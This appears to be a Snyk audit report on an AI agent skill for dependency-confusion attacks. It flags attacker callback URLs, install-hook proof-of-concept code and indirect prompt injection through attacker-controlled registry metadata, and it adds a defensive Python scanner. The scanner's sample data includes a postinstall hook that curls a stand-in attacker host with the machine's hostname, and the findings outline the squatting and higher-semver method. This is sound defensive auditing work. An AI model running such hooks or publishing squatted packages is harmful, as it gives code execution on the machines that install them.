dependency-confusion

Fail

Audited by Snyk on Apr 9, 2026

Risk Level: CRITICAL
Full Analysis

CRITICAL E005: Suspicious download URL detected in skill instructions.

  • Suspicious download URL detected (high risk: 0.70). Most of the listed resources are legitimate public ones (GitHub tools, Maven search), but the presence of attacker-controlled callback endpoints (the YOUR_CALLBACK_HOST placeholder) together with package-manager lifecycle-hook PoC patterns means these links can be used to publish or trigger malicious packages. That is highly risky if used outside authorized testing.

CRITICAL E006: Malicious code pattern detected in skill scripts.

  • Malicious code pattern detected (high risk: 1.00). The document is a high-risk, dual-use playbook: it gives explicit, actionable instructions and code snippets for dependency-confusion supply-chain attacks (registering squatted package names, publishing a higher semver than the internal package, and using lifecycle hooks such as preinstall/postinstall or custom install commands to trigger HTTP callbacks or arbitrary code execution). Those techniques yield remote code execution on any machine that installs the package and can lead to data exfiltration, so the content is readily weaponizable.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

  • Third-party content exposure detected (high risk: 1.00). Section 3 of the skill ("Check public squatting / claimability") explicitly instructs querying public registries (npm, PyPI, RubyGems, and Maven Central, via commands such as npm view, pip install --dry-run, gem search, and curl against search.maven.org) and then uses those external, untrusted results to drive its decision tree and the follow-up PoC/exploitation steps in Section 4. Registry metadata (descriptions, README text, maintainer fields) is attacker-controllable, so third-party content can materially influence the actions the skill takes.
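The indicators named in E006 and W011 (lifecycle hooks that call out to the network, internal-looking names that resolve from the public registry, and squatted versions published at an implausibly high semver) can be checked from the defender's side against an already-resolved dependency tree. The following is an added example written for this report, not the skill's code and not Snyk's tooling. The internal registry host, the `acme-` naming prefix, the major-version threshold and the sample manifests are all constructed assumptions; adjust them to the organization being reviewed.

```python
"""Heuristic scan of resolved npm dependency manifests for dependency-confusion
indicators: network-calling lifecycle hooks, internal-looking names resolved
from the public registry, and implausibly high published versions.

Added example; all hosts, prefixes, thresholds and sample data are assumptions.
"""
import re
from dataclasses import dataclass

PUBLIC_REGISTRY = "https://registry.npmjs.org/"
INTERNAL_REGISTRY = "https://npm.internal.example/"    # assumed internal registry
INTERNAL_PREFIXES = ("acme-",)                         # assumed internal naming convention
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Shell fragments that indicate a hook reaches out to the network.
NETWORK_RE = re.compile(r"https?://|\b(curl|wget|nc|ncat)\b")
# Heuristic: squatters publish e.g. 99.0.0 so the public package wins semver resolution.
SUSPICIOUS_MAJOR = 90


@dataclass
class Finding:
    package: str
    rule: str
    detail: str


def parse_major(version: str) -> int:
    """Return the leading major version number, or -1 if the string has none."""
    m = re.match(r"(\d+)", version)
    return int(m.group(1)) if m else -1


def scan_manifest(pkg: dict) -> list:
    """Apply the three indicator rules to one dependency's package.json-style metadata.

    `pkg` carries name, version, the `resolved` tarball URL (as in package-lock.json)
    and the package's own `scripts` table.
    """
    findings = []
    name = pkg["name"]
    version = pkg.get("version", "")
    resolved = pkg.get("resolved", "")
    scripts = pkg.get("scripts") or {}

    # Rule 1: lifecycle hooks run on install; network activity inside them is the
    # callback pattern flagged in E006.
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if cmd is None:
            continue
        severity = "high" if NETWORK_RE.search(cmd) else "info"
        findings.append(Finding(name, f"lifecycle-hook:{severity}", f"{hook}: {cmd}"))

    # Rule 2: an internal-looking name fetched from the public registry means the
    # public copy shadowed (or replaced) the internal one.
    if name.startswith(INTERNAL_PREFIXES) and resolved.startswith(PUBLIC_REGISTRY):
        findings.append(Finding(name, "public-shadow", f"internal-looking name resolved from {resolved}"))

    # Rule 3: an absurdly high major version is the "publish higher semver" trick.
    if parse_major(version) >= SUSPICIOUS_MAJOR:
        findings.append(Finding(name, "implausible-version", f"version {version}"))
    return findings


def scan_tree(manifests: list) -> list:
    """Scan every resolved dependency and return all findings in manifest order."""
    out = []
    for pkg in manifests:
        out.extend(scan_manifest(pkg))
    return out


# Constructed sample input: one benign public package, one squatted lookalike of an
# internal package, and one genuine internal package with a harmless build hook.
SAMPLE_MANIFESTS = [
    {"name": "example-util", "version": "1.4.2",
     "resolved": PUBLIC_REGISTRY + "example-util/-/example-util-1.4.2.tgz",
     "scripts": {"test": "node test.js"}},
    {"name": "acme-auth-client", "version": "99.0.0",
     "resolved": PUBLIC_REGISTRY + "acme-auth-client/-/acme-auth-client-99.0.0.tgz",
     "scripts": {"postinstall": "curl -s http://callback.attacker.example/cb?h=$(hostname)"}},
    {"name": "acme-logging", "version": "2.3.1",
     "resolved": INTERNAL_REGISTRY + "acme-logging/-/acme-logging-2.3.1.tgz",
     "scripts": {"prepare": "node build.js"}},
]

if __name__ == "__main__":
    for f in scan_tree(SAMPLE_MANIFESTS):
        print(f"{f.package:18} {f.rule:22} {f.detail}")
```

On the sample data the squatted `acme-auth-client` trips all three rules, `acme-logging` produces only an informational hook finding (a `prepare` script with no network access), and the public utility produces nothing. Real `package-lock.json` entries carry `resolved` but not `scripts`; the scripts table has to be read from each installed package's own `package.json` under `node_modules`, which is why the scan takes per-package manifests rather than the lockfile alone.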

Issues (3)

  • E005 (CRITICAL): Suspicious download URL detected in skill instructions.
  • E006 (CRITICAL): Malicious code pattern detected in skill scripts.
  • W011 (MEDIUM): Third-party content exposure detected (indirect prompt injection risk).

Audit Metadata

  Risk Level: CRITICAL
  Analyzed: Apr 9, 2026, 04:28 AM
  Issues: 3